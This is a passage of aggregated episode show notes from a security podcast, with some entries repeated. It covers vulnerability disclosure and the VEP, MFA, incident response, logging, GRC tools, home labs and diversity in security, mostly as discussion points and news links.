mitigated?" Gov orgs involved in VEP: https://en.wikipedia.org/wiki/Vulnerabilities_Equities_Process Assessing the Vulnerabilities Equities Process, Three Years After the VEP Charter Companies have VEP (every time they issue a patch), but they aren't always transparent about it. Embargoes a plenty. https://www.redhat.com/en/blog/security-embargoes-red-hat https://xenproject.org/developers/security-policy/ (creates a caste system of 'haves and not-haves'... important vs. not important) bad guys will target people not on the inside. 0day benefit from non-transparent VEP. https://www.randori.com/blog/why-zero-days-are-essential-to-security/ Randori had 365day… https://twitter.com/_MG_/status/1459024603263557633 https://twitter.com/JimSycurity/status/1459152870490574854 Preferred patch 8.1.17, issued october 2020 VEP does not always have to be 0day… can be solutions to issues: https://www.techdirt.com/articles/20210922/17095747614/fbi-sat-ransomware-decryption-key-weeks-as-victims-lost-millions-dollars.shtml "The FBI refrained for almost three weeks from helping to unlock the computers of hundreds of businesses and institutions hobbled by a major ransomware attack this summer, even though the bureau had secretly obtained the digital key needed to do so, according to several current and former U.S. officials. The key was obtained through access to the servers of the Russia-based criminal gang behind the July attack. Deploying it immediately could have helped the victims, including schools and hospitals, avoid what analysts estimate was millions of dollars in recovery costs. In a perfect world, what does disclosure look like? Communication (easy, secure, detailed… pick 1) Separating wheat from chaff - 'lol, i got root, pay me plz' Fear of NDAs and gag clauses Do people expect to be paid? Setup of a 'cheap' program? What if you don't have a budget to pay out (or more accurately, mgmt won't pay out)? People won't disclose? Should you pay? Use a 3rd party?

https://twitter.com/Esquiring - Fred Jennings Vulnerabilities Equity program (VEP), vuln disclosure program (VDP), and what is the best way for disclosure of 0day? ('proper' is different and dependent) This show was inspired by this Tweet thread from @k8em0 and @_MG_https://twitter.com/k8em0/status/1459715464691535877 https://twitter.com/_MG_/status/1459718518346174465 Legal Safe Harbor? Copy-left for security researchers…? What is a VEP? Not a new concept (2014) https://obamawhitehouse.archives.gov/blog/2014/04/28/heartbleed-understanding-when-we-disclose-cyber-vulnerabilities Context: Was written when Heartbleed came out. About transparency, but within reason From the blogpost:"We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability: How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems? Does the vulnerability, if left unpatched, impose significant risk? How much harm could an adversary nation or criminal group do with knowledge of this vulnerability? How likely is it that we would know if someone else was exploiting it? How badly do we need the intelligence we think we can get from exploiting the vulnerability? Are there other ways we can get it? Could we utilize the vulnerability for a short period of time before we disclose it? How likely is it that someone else will discover the vulnerability? Can the vulnerability be patched or otherwise mitigated?" Gov orgs involved in VEP: https://en.wikipedia.org/wiki/Vulnerabilities_Equities_Process Assessing the Vulnerabilities Equities Process, Three Years After the VEP Charter Companies have VEP (every time they issue a patch), but they aren't always transparent about it. Embargoes a plenty. https://www.redhat.com/en/blog/security-embargoes-red-hat https://xenproject.org/developers/security-policy/ (creates a caste system of 'haves and not-haves'... important vs. not important) bad guys will target people not on the inside. 0day benefit from non-transparent VEP. https://www.randori.com/blog/why-zero-days-are-essential-to-security/ Randori had 365day… https://twitter.com/_MG_/status/1459024603263557633 https://twitter.com/JimSycurity/status/1459152870490574854 Preferred patch 8.1.17, issued october 2020 VEP does not always have to be 0day… can be solutions to issues: https://www.techdirt.com/articles/20210922/17095747614/fbi-sat-ransomware-decryption-key-weeks-as-victims-lost-millions-dollars.shtml "The FBI refrained for almost three weeks from helping to unlock the computers of hundreds of businesses and institutions hobbled by a major ransomware attack this summer, even though the bureau had secretly obtained the digital key needed to do so, according to several current and former U.S. officials. The key was obtained through access to the servers of the Russia-based criminal gang behind the July attack. Deploying it immediately could have helped the victims, including schools and hospitals, avoid what analysts estimate was millions of dollars in recovery costs. In a perfect world, what does disclosure look like? Communication (easy, secure, detailed… pick 1) Separating wheat from chaff - 'lol, i got root, pay me plz' Fear of NDAs and gag clauses Do people expect to be paid? Setup of a 'cheap' program? What if you don't have a budget to pay out (or more accurately, mgmt won't pay out)? People won't disclose? Should you pay? Use a 3rd party?

In this sponsored BDS episode, Bryan Brake and Amanda Berlin interview Emily Eubanks, a Security Operations Analyst for #Blumira. We discuss common business risks like IT staff turnover, a lack of Incident Response procedures, choosing not to follow PowerShell best practices, and MFA use for critical or sensitive applications. We also discuss ways to improve security posture to mitigate these risks as well as how Blumira can help organizations in light of these common business challenges. ADDITIONAL RESOURCES OUR REDDIT AMA https://www.reddit.com/r/cybersecurity/comments/qao73j/we_are_a_security_team_with_20_years_of_ethical/ MFA https://attack.mitre.org/mitigations/M1032/ https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984 https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/ INCIDENT RESPONSE https://www.nist.gov/cyberframework/respond https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf POWERSHELL BEST PRACTICES https://www.blumira.com/analysis-of-a-threat-powershell-malicious-activity/ https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/ https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/ RISK: A lack of MFA where available or using SMS based MFA for critical applications. Please do not use SMS based MFA for critical applications. [6] [7] This is an easy layer of defense that has historically been very effective [5] One-Time Passwords (OTP) good but [8] FIDO U2F better Consider hardware tokens (e.g. Yubico YubiKey, Google Titan Security Key). MITIGATION: Blumira requires use of MFA MFA related detections (e.g. AWS, Duo) BLUMIRA HELPS: Incident Response Procedures RISK: A lack of Incident Response Procedures or the decision to postpone incident response procedures because they would result in a disruption in service typically results in unfavorable outcomes. A written plan that identifies the roles, responsibilities, and procedures that should be set in motion once an incident has been declared. If this is overwhelming to conceptualize, know there are a good amount of free and openly available resources already in existence to help with creations of new IR plans >> I highly recommend looking at NIST documentation to get an idea of what is possible and then scale to what is appropriate for your organization [4] The plan should be reviewed at a minimum once annually with everyone who is responsible for responding to incidents present. If anybody is unclear with their role, responsibilities or procedures then the Incident Response lead should work with them to get them there. Incident Response procedures should be like a fire drill so that when there is a real fire, the team can work together to quickly put that fire out and minimize impact to the company and their customers. (Shoutout to the BDS podcast on drawing connections from fire fighting to Incident Response procedures with Dr. Catherine J. Ullman (@investigatorchi)) MITIGATION: Workflows Blumira helps with this by providing built-in guidance with workflows. Workflows ask direct questions and provide specific options to record responses to security findings to guide practitioners towards a conclusion. provides additional details to help operators make informed decisions in response to new findings. Finding analysis BLUMIRA HELPS: Recent or Frequent IT Staff Turnover RISK: impedes troubleshooting logflow and/or investigations due the a lack of familiarity with the network environment Prevention might be the best solution? Giving your workers time during the work week to improve a work related skill can help identify when a team is reaching or exceeding their resource capacity. If your team is overworked they are more likely to make mistakes, will be less prepared to go the extra mile when it is needed because they'll already be tapped out of energy, and may be more likely to consider opportunities elsewhere. You want to limit keystone employees, meaning that if an employee leaves for whatever reason you do not want that employee's absence to cause a breakdown in processes for others. Redundancy is best here in most cases IMO. MITIGATION: Blumira works hard to create fewer, more actionable findings. We strive to keep our alerts simple to provide the information that operators need to make informed decisions. We try to focus on findings that require action and provide workflows to provide additional guidance to help share recommendations on what to investigate next to evaluate the impact of a security event BLUMIRA HELPS: PowerShell Scripting Best Practices RISK: Detections will be less helpful if staff are frequently dismissing events in response to approved administrative behavior like maintenance scripts. Follow the PowerShell recommendations shared by Microsoft [1] including: Sign your scripts (lol Microsoft has this b

https://www.bleepingcomputer.com/news/security/us-education-dept-urged-to-boost-k-12-schools-ransomware-defenses/ https://securityaffairs.co/wordpress/124570/cyber-crime/fbi-hacked-email-server.html https://www.zdnet.com/article/security-company-faces-backlash-for-waiting-12-months-to-disclose-palo-alto-0-day/ https://www.randori.com/blog/why-zero-days-are-essential-to-security/ https://twitter.com/_MG_/status/1459024603263557633 "Hey... did anyone notice that PAN 0day was fixed in a version that was released over a year ago? Guess it wasn't easy to notice under all the loud opinions about ethics." https://twitter.com/_MG_/status/1459038747807285253/photo/1

News stories covered this week, as well as links of note: https://www.wired.co.uk/article/sweden-stockholm-school-app-open-source https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a https://docs.google.com/presentation/d/17gISafUZzEyjV7wkdHaTQZmtxstBqECa/edit#slide=id.p4 https://www.securityweek.com/braktooth-new-bluetooth-vulnerabilities-could-affect-millions-devices https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html https://searchsecurity.techtarget.com/news/252509040/CISA-cracks-the-whip-on-patching-vulnerabilities https://cyber.dhs.gov/bod/22-01/ https://www.cisa.gov/known-exploited-vulnerabilities-catalog

https://securityaffairs.co/wordpress/123948/security/2021-list-of-most-common-hardware-weaknesses.html? https://www.whitehouse.gov/wp-content/uploads/2021/08/M-21-31-Improving-the-Federal-Governments-Investigative-and-Remediation-Capabilities-Related-to-Cybersecurity-Incidents.pdf https://www.darkreading.com/application-security/tech-companies-create-security-baseline-for-enterprise-software https://security.googleblog.com/2021/10/launching-collaborative-minimum.html https://mvsp.dev/mvsp.en/index.html https://www.standardfusion.com/blog/assessing-vendor-risk-with-questionnaires/

From Nato's email:Hi Bryan, Discussing the challenges that come with not having good logging in place could be a great topic! We could make it partly about how security maturity works, in the idea that security generally starts with awareness and visibility. The topic sort of gets into the idea that knowing is half the battle, so logging can be transformative for helping a company properly secure themselves from online risks! What do you think of this topic idea? https://www.blumira.com/careers/ https://thenewstack.io/logging-and-monitoring-why-you-need-both/ https://prometheus.io/ https://www.sentinelone.com/blog/the-10-commandments-of-logging/ https://towardsdatascience.com/why-should-you-care-about-logging-442a195b80a1 https://www.g2.com/products/blumira-automated-detection-response/reviews#survey-response-4908309 (wouldn't you know it… a couple additional google searches, and I find this -brbr)https://www.executivegov.com/2021/08/omb-creates-maturity-framework-for-event-log-management/) https://insidecybersecurity.com/sites/insidecybersecurity.com/files/documents/2021/may/cs2021_0089c.pdf Logging maturity in the US gov (OMB policy doc): https://www.whitehouse.gov/wp-content/uploads/2021/08/M-21-31-Improving-the-Federal-Governments-Investigative-and-Remediation-Capabilities-Related-to-Cybersecurity-Incidents.pdf Are there examples of devices that don't give out logs? What if your vendor does not allow you to have logs? Can you create logs based on the activity of the device? What would that look like? Types of logs: Application logs Network logs Endpoint security logs OS logs IDS/IPS logs Vuln scanner logs

Blog post that inspired this episode: https://lizsaling.com/SWE-team-five-pillars/ Liz Saling (@lizsaling) https://www.mindtools.com/pages/article/newLDR_86.htm http://www.mspguide.org/tool/tuckman-forming-norming-storming-performing https://michaelhyatt.com/3-roadblocks-to-avoid-for-optimal-team-performance Erin meyer is the one who did the netflix study! https://bigthink.com/the-present/high-performing-teams/ https://alicedartnell.com/blog/why-smart-goals-are-stupid/ NEWS: Unlocking 'god' mode on windows 11: https://www.bleepingcomputer.com/news/microsoft/how-to-unlock-windows-11s-god-mode-to-access-advanced-settings/ https://www.reddit.com/r/netsec/comments/q9f63y/creating_a_basic_python_reverse_shell_listener/ NFT malware (NFTs that empty wallets): https://www.theregister.com/2021/10/17/in_brief_security/

Tony Robinson (@da_667) Thought we'd put in a little news to round out the show https://www.bbc.com/news/world-us-canada-58863678 - nuclear secrets hidden in a peanut butter sandwich https://www.theregister.com/2018/04/20/rsa_security_conference_insecure_mobile_app/ https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch https://nakedsecurity.sophos.com/2021/10/08/apache-patch-proves-patchy-now-you-need-to-patch-the-patch/ https://www.securityweek.com/fontonlake-linux-malware-used-targeted-attacks https://securityaffairs.co/wordpress/123182/breaking-news/medtronic-recalled-insulin-pumps-controllers.html Similar device on ebay: https://www.ebay.com/itm/324762812721 https://www.zdnet.com/article/brewdog-exposed-data-of-200000-shareholders-for-over-a-year/ https://tpetersonkth.github.io/cve/2021/10/02/Analysis-of-CVE-2019-9053.html https://0xdf.gitlab.io/ www.leanpub.com/avatar2 MSRP = $30 USD Book changes What is the end goal? Upskill? Independent consultant? Promotion? Bug bounties? Lab setup - Lab setup types Cloud based - Desktop/laptop/NUC - Server - Good VMs to https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ - 90 day WIndows machines What other home lab equipment have would be helpful?Testing IoT/embedded devices? Car hacking? Malware analysis? https://bazaar.abuse.ch/ Virus Total Intelligence Honeypots @malware_traffic - https://twitter.com/malware_traffic/status/1446627364147023877 Analyzing binaries? Patch analysis (patch tuesday, print nightmare, etc)? https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html https://www.netresec.com/?page=networkminer Soldering? Oscillators for voltage checks? Wireless? Old cellphones (mobile apps, don't need cellular) Personal assistant devices (used IoT devices?) Accessing data stored on devices Specific software licenses? Burp? If I'm trying to break into infosec, how do I use my lab to sell myself to an employer? Does the employer care? How can someone show what they've learned in a way that shows the value?

Tony Robinson (@da_667) Thought we'd put in a little news to round out the show https://www.bbc.com/news/world-us-canada-58863678 - nuclear secrets hidden in a peanut butter sandwich https://www.theregister.com/2018/04/20/rsa_security_conference_insecure_mobile_app/ https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch https://nakedsecurity.sophos.com/2021/10/08/apache-patch-proves-patchy-now-you-need-to-patch-the-patch/ https://www.securityweek.com/fontonlake-linux-malware-used-targeted-attacks https://securityaffairs.co/wordpress/123182/breaking-news/medtronic-recalled-insulin-pumps-controllers.html Similar device on ebay: https://www.ebay.com/itm/324762812721 https://www.zdnet.com/article/brewdog-exposed-data-of-200000-shareholders-for-over-a-year/ https://tpetersonkth.github.io/cve/2021/10/02/Analysis-of-CVE-2019-9053.html https://0xdf.gitlab.io/ www.leanpub.com/avatar2 MSRP = $30 USD Book changes What is the end goal? Upskill? Independent consultant? Promotion? Bug bounties? Lab setup - Lab setup types Cloud based - Desktop/laptop/NUC - Server - Good VMs to https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ - 90 day WIndows machines What other home lab equipment have would be helpful?Testing IoT/embedded devices? Car hacking? Malware analysis? https://bazaar.abuse.ch/ Virus Total Intelligence Honeypots @malware_traffic - https://twitter.com/malware_traffic/status/1446627364147023877 Analyzing binaries? Patch analysis (patch tuesday, print nightmare, etc)? https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html https://www.netresec.com/?page=networkminer Soldering? Oscillators for voltage checks? Wireless? Old cellphones (mobile apps, don't need cellular) Personal assistant devices (used IoT devices?) Accessing data stored on devices Specific software licenses? Burp? If I'm trying to break into infosec, how do I use my lab to sell myself to an employer? Does the employer care? How can someone show what they've learned in a way that shows the value?

GRC tools (Governance Risk and Compliance) @ki_twyce_ @TechSecChix INfosec unplugged Security Happy Hour Eric's cyberpoppa show Cyber Insight show - cohost Blumira is hiring https://www.blumira.com/careers/ https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html https://www.pwc.ch/en/insights/fs/10-pitfalls-when-implementing-grc-technology-and-how-to-avoid-them.html https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/ Why do we need a GRC tool? https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register What are our business goals? (to make money... :D ) Are we mature enough to be measuring ourselves? How can we use this to be more efficient? https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/ Centralized Controls. ... Support for Future Standards. ... Automation Integrations (my add… helpdesk integrations, 3rd party) Scalability. ... Customizable Reporting. ... Flexibility. ... Task Delegation GRC tool use in other areas IT - makes more informed budget decisions, determines directions in business goals, asset mgmt Finance - Make better financial decisions, profitability Infosec- vuln mgmt, Compliance HR - determine hiring requirements Legal - ensures ethical management of the organization, reduces breach, How do you implement GRC? https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation Step 0: everyone's input and use cases Determine the total value gained by using a centralized GRC platform Missing data Duplicate processes Duplicate data Manual steps that can be removed or automated Workflows to assist heavily manual areas such as communications, emails, approvals, and reporting Identify operational gaps to prioritize the areas you need to improve. Get your team on board with an effectively communicated plan. Build a strong foundation to support your GRC program Deploy a standardized GRC implementation across the board. Let the GRC framework evolve and grow after it's implemented.

GRC tools (Governance Risk and Compliance) @ki_twyce_ @TechSecChix INfosec unplugged Security Happy Hour Eric's cyberpoppa show Cyber Insight show - cohost Blumira is hiring https://www.blumira.com/careers/ https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html https://www.pwc.ch/en/insights/fs/10-pitfalls-when-implementing-grc-technology-and-how-to-avoid-them.html https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/ Why do we need a GRC tool? https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register What are our business goals? (to make money... :D ) Are we mature enough to be measuring ourselves? How can we use this to be more efficient? https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/ Centralized Controls. ... Support for Future Standards. ... Automation Integrations (my add… helpdesk integrations, 3rd party) Scalability. ... Customizable Reporting. ... Flexibility. ... Task Delegation GRC tool use in other areas IT - makes more informed budget decisions, determines directions in business goals, asset mgmt Finance - Make better financial decisions, profitability Infosec- vuln mgmt, Compliance HR - determine hiring requirements Legal - ensures ethical management of the organization, reduces breach, How do you implement GRC? https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation Step 0: everyone's input and use cases Determine the total value gained by using a centralized GRC platform Missing data Duplicate processes Duplicate data Manual steps that can be removed or automated Workflows to assist heavily manual areas such as communications, emails, approvals, and reporting Identify operational gaps to prioritize the areas you need to improve. Get your team on board with an effectively communicated plan. Build a strong foundation to support your GRC program Deploy a standardized GRC implementation across the board. Let the GRC framework evolve and grow after it's implemented.

8 Steps to Better Security: A Simple Cyber Resilience Guide to Business is done all final editing and will be published by @WileyTech on October 5th. Pre-orders are available now via Amazon, Barnes & Noble, and other retailers. Sponsored Link: https://amzn.to/3k3pDAN Amazon teaser: "Harden your business against internal and external cybersecurity threats with a single accessible resource. In 8 Steps to Better Security: A Simple Cyber Resilience Guide for Business, cybersecurity researcher and writer Kim Crawley delivers a grounded and practical roadmap to cyber resilience in any organization. Offering you the lessons she learned while working for major tech companies like Sophos, AT&T, BlackBerry Cylance, Tripwire, and Venafi, Crawley condenses the essence of business cybersecurity into eight steps. Written to be accessible to non-technical businesspeople as well as security professionals, and with insights from other security industry leaders, this important book will walk you through how to: Foster a strong security culture that extends from the custodial team to the C-suite Build an effective security team, regardless of the size or nature of your business Comply with regulatory requirements, including general data privacy rules and industry-specific legislation Test your cybersecurity, including third-party penetration testing and internal red team specialists Perfect for CISOs, security leaders, non-technical businesspeople, and managers at any level, 8 Steps to Better Security is also a must-have resource for companies of all sizes, and in all industries. "

Blumira- Per crunchbase:"Blumira's end-to-end platform offers both automated threat detection and response, enabling organizations of any size to more efficiently defend against cybersecurity threats in near real-time. It eases the burden of alert fatigue, complexity of log management and lack of IT visibility. Blumira's cloud SIEM can be deployed in hours with broad integration coverage across cloud, endpoint protection, firewall and identity providers including Office 365, G Suite, Crowdstrike, Okta, Palo Alto, Cisco FTD and many others." Contact [email protected] Patrick Garrity, VP of Operations. Patrick has years of experience in the security industry building and scaling usable security products. He currently leads Blumira's product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security. Twitter = @Thisisnottap https://www.ibm.com/cloud/blog/top-5-advantages-of-software-as-a-service https://www.outsource2india.com/software/articles/software-as-a-service.asp 5 Advantages of SaaS Reduced time to benefit. Software as a service (SaaS) differs from the traditional model because the software (application) is already installed and configured. ... Lower costs. ... Scalability and integration. ... New releases (upgrades) ... Easy to use and perform proof-of-concepts. 5 Disadvantages of SaaS Insufficient Data Security. SaaS-based application model. Difficulty with Regulations Compliance. Cumbersome Data Mobility. Low Performance. Troublesome Software Integration. Limit Attack Surface https://www.wallix.com/blog/top-10-ways-to-limit-attack-surface https://www.okta.com/identity-101/what-is-an-attack-surface/ https://securityscorecard.com/blog/what-is-cyber-attack-surface-management

8 Steps to Better Security: A Simple Cyber Resilience Guide to Business is done all final editing and will be published by @WileyTech on October 5th. It is available now via Kindle. Pre-orders are available now via Amazon, Barnes & Noble, and other retailers. Sponsored Link: https://amzn.to/3k3pDAN Amazon teaser: "Harden your business against internal and external cybersecurity threats with a single accessible resource. In 8 Steps to Better Security: A Simple Cyber Resilience Guide for Business, cybersecurity researcher and writer Kim Crawley delivers a grounded and practical roadmap to cyber resilience in any organization. Offering you the lessons she learned while working for major tech companies like Sophos, AT&T, BlackBerry Cylance, Tripwire, and Venafi, Crawley condenses the essence of business cybersecurity into eight steps. Written to be accessible to non-technical businesspeople as well as security professionals, and with insights from other security industry leaders, this important book will walk you through how to: Foster a strong security culture that extends from the custodial team to the C-suite Build an effective security team, regardless of the size or nature of your business Comply with regulatory requirements, including general data privacy rules and industry-specific legislation Test your cybersecurity, including third-party penetration testing and internal red team specialists Perfect for CISOs, security leaders, non-technical businesspeople, and managers at any level, 8 Steps to Better Security is also a must-have resource for companies of all sizes, and in all industries.

"bel paese, ma più caldo del buco del culo di Satana" https://www.theverge.com/22648265/apple-employee-privacy-icloud-id https://mysudo.com/ https://arstechnica.com/information-technology/2021/09/npm-package-with-3-million-weekly-downloads-had-a-severe-vulnerability/ https://www.bleepingcomputer.com/news/security/bluetooth-braktooth-bugs-could-affect-billions-of-devices/ www.infoseccampout.com www.log-md.com @infosystir @bryanbrake @brakesec @hackershealth @boettcherpwned

https://blog.teamascend.com/6-phases-of-incident-response https://www.securitymetrics.com/blog/6-phases-incident-response-plan Recent vulnerabilities got Bryan thinking about incident response. Are organizations speedy enough to keep up? If the spate of vulns continue, what can we do to ensure we are dealing with the most important issues? How do we communicate those issues to management? How should we handle the workload? Testing of your IR costs money, do you have budget for that? (verodin, red-team) Restoring backups, extra VPC or azure environment Incidents occur You have to minimize issues, right? But is there a good way of doing that? Simplify your environment? Spend time working on the CIS 20? You gotta plan for that and show value vs effort. Incident response is an ever changing landscape. What is the goal of IR? Minimize damage Identify affected systems Recover gracefully and quickly? Does your environment allow for quick recovery? What does 'return to normal' look like? The goal of business Make money Incidents should just be considered part of doing business (risks) The more popular, the more likely the attack Incident timeframe = criteria for getting back to normal. PICERL is a cycle, and one of continual improvement. Incident response is not 'one and done'.

https://blog.teamascend.com/6-phases-of-incident-response https://www.securitymetrics.com/blog/6-phases-incident-response-plan Recent vulnerabilities got Bryan thinking about incident response. Are organizations speedy enough to keep up? If the spate of vulns continue, what can we do to ensure we are dealing with the most important issues? How do we communicate those issues to management? How should we handle the workload? Testing of your IR costs money, do you have budget for that? (verodin, red-team) Restoring backups, extra VPC or azure environment Incidents occur You have to minimize issues, right? But is there a good way of doing that? Simplify your environment? Spend time working on the CIS 20? You gotta plan for that and show value vs effort. Incident response is an ever changing landscape. What is the goal of IR? Minimize damage Identify affected systems Recover gracefully and quickly? Does your environment allow for quick recovery? What does 'return to normal' look like? The goal of business Make money Incidents should just be considered part of doing business (risks) The more popular, the more likely the attack Incident timeframe = criteria for getting back to normal. PICERL is a cycle, and one of continual improvement. Incident response is not 'one and done'.

BlackGirlsHack was created to share knowledge and resources to help black girls and women breakthrough barriers to careers in information security and cyber security. The vision for Black Girls Hack (BGH) is to provide resources, training, mentoring, and access to black girls and women and increase representation and diversity in the cyber security field and in the executive suites. Rebekah Skeete CyberBec @rebekahskeete Tennisha Martin ~@misstennish https://blackgirlshack.org/ https://www.twitter.com/blackgirlshack - black girls hack https://www.twitter.com/thefluffy007 - jasmine jackson Background https://hitz.com.my/trending/trending-on-hitz/people-that-walk-fast-are-reported-to-be-less-happ Vegas conference - Blacks in Cyber Village https://forum.defcon.org/node/236946 https://www.blacksincyberconf.com/bic-village https://www.youtube.com/c/BlacksInCybersecurity https://www.blacksincyberconf.com/ctf https://www.marketwatch.com/story/retired-black-nfl-players-and-their-families-call-for-race-norming-practice-to-end-01621018741 https://en.wikipedia.org/wiki/Blind_men_and_an_elephant https://fuzzcon.forallsecure.com/ https://www.dianainitiative.org/ Social Engineering topics Misophonia - or phonophobic https://www.washingtonpost.com/national/health-science/misophonia-is-a-newly-identified-condition-for-people-hypersensitive-to-sound/2014/12/01/7c392782-69ba-11e4-a31c-77759fc1eacc_story.html https://thecyberwire.com/podcasts/8th-layer-insights https://terranovasecurity.com/examples-of-social-engineering-attacks/ How all either are directly influenced by. News, and cool links to read. https://chubk.com/youtuber-who-specializes-in-unmasking-scammers-ended-up-being-tricked-even-deleting-his-own-youtube-channel/ -LOL SE write-up of a legitimate company (archive.org) https://web.archive.org/web/20190124114926/https://medium.com/@0xf3d/dissecting-arbitraging-co-in-depth-youve-been-scammed-again-21306de00fe5 Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

BlackGirlsHack was created to share knowledge and resources to help black girls and women breakthrough barriers to careers in information security and cyber security. The vision for Black Girls Hack (BGH) is to provide resources, training, mentoring, and access to black girls and women and increase representation and diversity in the cyber security field and in the executive suites. Rebekah Skeete CyberBec @rebekahskeete Tennisha Martin ~@misstennish https://blackgirlshack.org/ https://www.twitter.com/blackgirlshack - black girls hack https://www.twitter.com/thefluffy007 - jasmine jackson Background https://hitz.com.my/trending/trending-on-hitz/people-that-walk-fast-are-reported-to-be-less-happ Vegas conference - Blacks in Cyber Village https://forum.defcon.org/node/236946 https://www.blacksincyberconf.com/bic-village https://www.youtube.com/c/BlacksInCybersecurity https://www.blacksincyberconf.com/ctf https://www.marketwatch.com/story/retired-black-nfl-players-and-their-families-call-for-race-norming-practice-to-end-01621018741 https://en.wikipedia.org/wiki/Blind_men_and_an_elephant https://fuzzcon.forallsecure.com/ https://www.dianainitiative.org/ Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

https://www.mindtools.com/pages/article/newHTE_95.htm https://www.infoq.com/news/2021/07/microsoft-linux-builder-mariner/ https://www.productplan.com/glossary/action-priority-matrix/ More PrintNightmare issues: https://www.bleepingcomputer.com/news/microsoft/windows-10-july-security-updates-break-printing-on-some-systems/ ""After installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of RFC 4556 spec might fail to print when using smart card (PIV) authentication," Microsoft explained." https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/ "Shlayer, discovered in 2018, is constantly maintained and also evolving. The graph below is representative of Shlayer continually being a go-to piece of malware that attackers use to compromise the victim's machine. We observed an uptick in Shlayer detections occurring before the release of CVE-2021-30657 (the Gatekeeper bypass) that was being exploited by Shlayer. This vulnerability was subsequently patched on April 26, 2021." https://www.zdnet.com/article/nasty-linux-systemd-security-bug-revealed/ https://access.redhat.com/security/cve/cve-2021-33910 "It works by enabling attackers to misuse the alloca() function in a way that would result in memory corruption. This, in turn, allows a hacker to crash systemd and hence the entire operating system. Practically speaking, this can be done by a local attacker mounting a filesystem on a very long path. This causes too much memory space to be used in the systemd stack, which results in a system crash." There's no way to remedy this problem. While it's not present in all current Linux distros, you'll find it in most distros such as the Debian 10 (Buster) and its relatives like Ubuntu and Mint. Therefore, you must, if you value keeping your computers working, patch your version of systemd as soon as possible. You'll be glad you did. https://www.bleepingcomputer.com/news/security/atlassian-asks-customers-to-patch-critical-jira-vulnerability/ https://redmondmag.com/articles/2021/07/21/serioussam-windows-flaw.aspx https://securityaffairs.co/wordpress/120576/security/apple-cve-2021-30807-zero-day.html? https://github.com/GossiTheDog/HiveNightmare Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec 